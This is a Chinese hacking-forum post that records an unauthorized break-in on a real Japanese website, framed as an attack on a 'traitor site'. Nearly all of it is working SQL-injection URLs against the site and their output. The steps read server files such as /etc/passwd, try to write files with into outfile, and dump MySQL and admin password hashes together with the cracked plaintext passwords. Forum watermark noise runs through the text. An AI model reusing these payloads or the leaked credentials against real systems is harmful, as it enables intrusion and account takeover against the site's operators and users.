原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

( t, J6 T9 i* r  K  H  D3 h
6 Q8 z3 A  }# w% s1 y# ^* Q$ i0x01. 检测 www.zuaa.jp 收集数据


/ g# ?1 Y5 b9 t/ d* qwhatweb

% p* Y! F/ E6 s) n* Y- a
利用NMAP扫描
" {# Y1 f2 S% ~: y
7 [+ j8 n6 h$ M. ?8 C中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390


( p/ h3 M# T  c7 v# q, j: {0x03.order by
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
" s) Z* M/ k' q& Y' Y8 [/ P" c
order by 28报错，order by 27正常

3 Q* x8 I! ?- K$ o! O0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
- l. V) |1 U9 i+ ?4 ~$ F. l6 Y& _/ R7 G' x- ~
8 q3 {# c6 }5 |4 b0x05. info:
7 c( L' g" U6 E- A) Uhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
" Y" j, u' t  @" Z1 W1 L
user:            root@localhost
% a  o3 u) J+ T0 O& v" {database:    openpne
' A, D7 c! x! V# r4 R$ u: \version:      4.1.22
os:             portbld-freebsd5.4
% X4 N. g& y% F  @- [& a% E- V4 Y
0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
6 u$ m+ n$ q( a9 ~- Mhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

* I1 M6 i4 J* }% r! T' Z通过工具转换
7 x# a3 w) T- r9 W, |. Q1 b$ ]
) ~% C; y4 w  ~% _. ~中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
% ^9 W8 }: A8 {& V& q1 E, s
0x07. 利用 into outfile
' Q3 s' C( e& Q全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
/ g5 U9 _2 k( ?& C8 S
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
$ p4 T. ]7 L0 V6 d$ @
. d5 ~: c0 b8 _1 J1 I0 y页面显示“MDB2 Error:syntax error”
6 E7 H& A/ P/ Z- a0 q
( H0 F9 J- ?6 Z" L+ r( v0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
9 @$ F4 m2 _, c1 ]' f* u
! H4 A4 L: U, r" E/ S% Y
7 k' }# g- M7 i7 X
0x09. 查找后台
利用 现有的各种 后台工具尝试都不行

& b# a1 c4 a- g. j1 d& A. B& e7 h0x10.  MySL外联方法
8 p, G2 a  r0 J# z1 y4 ?: R从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

这个可以在 www.cmd5.com 解密
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
; ]; t0 y# G" p5 czuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知


. \' n9 O, ?: B' ~+ N0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码

6 ?, b+ ~3 H2 X1 H/ v. C# B
  j3 z1 {, A& X0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login
% I- m  |% O& ?, g) x0 }" P
表名 (c_admin_user) ，字段名（username,password）
3 |) _; W* |+ l- U, u0 O% y% xhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
9 l+ [/ J6 m. M6 h5 p7 t6 }
) d7 A% o1 z- ^- o0 N) Z解密
( s) I( D" r' ~4 L- |zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
. z8 N' M( D' A1 v3 p
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x13. 登录后台
  o% ?3 j1 \: w4 T, K# z

1 s" t- C& S0 p: N8 {
0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
/ `& i0 c: V9 c$ ]1 j, C$ f* o! d感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
: l) p$ [7 B8 d! R------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
8 h* n# f( N* F* q) @中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
2 k5 _/ z, [8 W5 ?& r% A

荒村狂客

哪个牛人 费的这劲 入侵的